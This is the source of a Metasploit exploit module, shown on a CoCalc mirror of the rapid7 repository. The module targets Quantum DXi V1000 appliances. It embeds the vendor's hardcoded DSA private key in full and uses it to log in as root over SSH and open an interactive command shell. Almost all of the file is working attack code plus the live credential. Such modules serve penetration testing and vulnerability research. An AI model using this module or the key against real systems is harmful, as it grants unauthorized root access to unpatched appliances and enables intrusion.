CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'net/ssh'

7
require 'net/ssh/command_stream'

8


9
class MetasploitModule < Msf::Exploit::Remote

10
  Rank = ExcellentRanking

11


12
  include Msf::Exploit::Remote::SSH

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        {

19
          'Name' => 'Quantum DXi V1000 SSH Private Key Exposure',

20
          'Description' => %q{

21
            Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that

22
            allows passwordless authentication to any other DXi box. Since the key is

23
            easily retrievable, an attacker can use it to gain unauthorized remote

24
            access as root.

25
          },

26
          'Platform' => 'unix',

27
          'Arch' => ARCH_CMD,

28
          'Privileged' => true,

29
          'Targets' => [ [ 'Universal', {} ] ],

30
          'Payload' => {

31
            'Compat' => {

32
              'PayloadType' => 'cmd_interact',

33
              'ConnectionType' => 'find'

34
            }

35
          },

36
          'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module

37
          'License' => MSF_LICENSE,

38
          'References' => [

39
            ['PACKETSTORM', '125755']

40
          ],

41
          'DisclosureDate' => '2014-03-17',

42
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

43
          'DefaultTarget' => 0,

44
          'Notes' => {

45
            'Stability' => [CRASH_SAFE],

46
            'Reliability' => [REPEATABLE_SESSION],

47
            'SideEffects' => []

48
          }

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        # Since we don't include Tcp, we have to register this manually

56
        Opt::RHOST(),

57
        Opt::RPORT(22)

58
      ], self.class

59
    )

60


61
    register_advanced_options(

62
      [

63
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

64
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])

65
      ]

66
    )

67
  end

68


69
  # helper methods that normally come from Tcp

70
  def rhost

71
    datastore['RHOST']

72
  end

73


74
  def rport

75
    datastore['RPORT']

76
  end

77


78
  def do_login(user)

79
    opt_hash = ssh_client_defaults.merge({

80
      auth_methods: ['publickey'],

81
      port: rport,

82
      key_data: [ key_data ]

83
    })

84


85
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']

86
    begin

87
      ssh_socket = nil

88
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

89
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)

90
      end

91
    rescue Rex::ConnectionError

92
      return nil

93
    rescue Net::SSH::Disconnect, ::EOFError

94
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

95
      return nil

96
    rescue ::Timeout::Error

97
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"

98
      return nil

99
    rescue Net::SSH::AuthenticationFailed

100
      print_error "#{rhost}:#{rport} SSH - Failed authentication"

101
      return nil

102
    rescue Net::SSH::Exception => e

103
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"

104
      return nil

105
    end

106


107
    if ssh_socket

108


109
      # Create a new session from the socket, then dump it.

110
      conn = Net::SSH::CommandStream.new(ssh_socket)

111
      ssh_socket = nil

112


113
      return conn

114
    else

115
      return nil

116
    end

117
  end

118


119
  def exploit

120
    conn = do_login('root')

121
    if conn

122
      print_good "#{rhost}:#{rport} - Successful login"

123
      handler(conn.lsock)

124
    end

125
  end

126


127
  def key_data

128
    <<~EOF

129
      -----BEGIN DSA PRIVATE KEY-----

130
      MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2

131
      hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t

132
      Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2

133
      +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4

134
      6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5

135
      PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr

136
      E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK

137
      6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn

138
      k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u

139
      B3Upsx556K/iZPPnJZE=

140
      -----END DSA PRIVATE KEY-----

141
    EOF

142
  end

143
end

144


145